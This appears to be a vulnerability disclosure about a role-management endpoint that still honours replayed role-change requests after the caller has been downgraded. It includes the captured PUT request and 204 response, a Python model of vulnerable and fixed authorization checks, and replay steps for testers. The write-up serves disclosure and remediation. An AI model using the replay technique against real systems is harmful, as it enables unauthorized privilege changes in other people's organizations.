1. First, we have two users, user1 and user2. User1 invites user2 to his organization (org) and gives him the Admin role.
2. Then, user2 downgrades user1's role to an internal user, which has only basic, limited permissions.
3. Now, user1 still has the requests he saved earlier that downgrade or upgrade other users' roles in the org. When he replays them with his existing session, they still succeed: the server accepts the role change even though user1 is now only an internal user, so the downgrade is not enforced on the role-management endpoint and user1 can still change any user's role.
The request:

PUT /__api/v0_1/company/REDACTED/user/REDACTED/roles HTTP/1.1
Host: [REDACTED]
Cookie: sessionIdManager=REDACTED; __Secure-csrf=REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]/contacts
Content-Type: application/json
X-Cb-Csrf: REDACTED
X-Is-Ajax-Call: true
Content-Length: 0
Origin: [REDACTED]

["user"]
The response:

HTTP/1.1 204 No Content
Date: Wed, 13 Nov 2024 16:18:47 GMT
Connection: keep-alive
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-requestid: REDACTED
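The page does not show how the role endpoint is implemented, so the following is an added example, not the vendor's code: an in-memory model of steps 1 to 3 that reproduces the 204 above when the endpoint authorizes on the role cached at login, next to a fixed version that re-reads the caller's current role from the user store on every request. The class and function names, the role strings "admin" and "user", and the status codes are all assumptions made for the illustration; the `["user"]` body shape follows the captured request.

```python
# Added example (not from the original write-up): a model of the role-change
# endpoint showing why a replayed PUT .../roles keeps working after the caller
# is downgraded, beside a version that checks the caller's current role.
# Org, Session, the role names and the status codes are assumptions.
from dataclasses import dataclass
import secrets

ROLE_ADMIN = "admin"
ROLE_USER = "user"            # stands in for the "internal user" role of step 2
KNOWN_ROLES = {ROLE_ADMIN, ROLE_USER}


@dataclass
class Session:
    user_id: str
    role_at_login: str        # snapshot taken when the session cookie was issued


class Org:
    """Tiny stand-in for the company/user role store behind PUT .../roles."""

    def __init__(self):
        self.roles = {}       # user_id -> current role (the source of truth)
        self.sessions = {}    # session id -> Session

    def add_user(self, user_id, role):
        self.roles[user_id] = role

    def login(self, user_id):
        sid = secrets.token_hex(8)
        self.sessions[sid] = Session(user_id, self.roles[user_id])
        return sid

    def _apply(self, target, new_roles):
        # The body is a JSON array with one role, e.g. ["user"], as captured above.
        if len(new_roles) != 1 or new_roles[0] not in KNOWN_ROLES \
                or target not in self.roles:
            return 400
        self.roles[target] = new_roles[0]
        return 204

    def set_roles_vulnerable(self, sid, target, new_roles):
        """Authorizes on the role cached in the session: a later downgrade is never seen."""
        sess = self.sessions.get(sid)
        if sess is None:
            return 401
        if sess.role_at_login != ROLE_ADMIN:
            return 403
        return self._apply(target, new_roles)

    def set_roles_fixed(self, sid, target, new_roles):
        """Authorizes on the caller's current role, read from the store per request."""
        sess = self.sessions.get(sid)
        if sess is None:
            return 401
        if self.roles.get(sess.user_id) != ROLE_ADMIN:
            return 403
        return self._apply(target, new_roles)


def reproduce(fixed):
    """Replays steps 1-3 of the write-up; returns (replay status, user2's final role)."""
    org = Org()
    org.add_user("user1", ROLE_ADMIN)
    org.add_user("user2", ROLE_USER)
    endpoint = org.set_roles_fixed if fixed else org.set_roles_vulnerable

    s1 = org.login("user1")
    assert endpoint(s1, "user2", [ROLE_ADMIN]) == 204   # step 1: user2 becomes Admin
    s2 = org.login("user2")
    assert endpoint(s2, "user1", [ROLE_USER]) == 204    # step 2: user1 downgraded
    # step 3: user1 replays his saved PUT with the session cookie he still holds
    status = endpoint(s1, "user2", [ROLE_USER])
    return status, org.roles["user2"]


if __name__ == "__main__":
    print("vulnerable:", reproduce(fixed=False))   # (204, 'user')
    print("fixed:     ", reproduce(fixed=True))    # (403, 'admin')
```

The check a tester would run against the real target is the same as step 3: keep the PUT captured while the account was still Admin, have the other Admin downgrade the account, and replay the request unchanged with the old `sessionIdManager` cookie. A 204 after the downgrade, as in the response above, means the role is not re-evaluated per request; a 403 means it is.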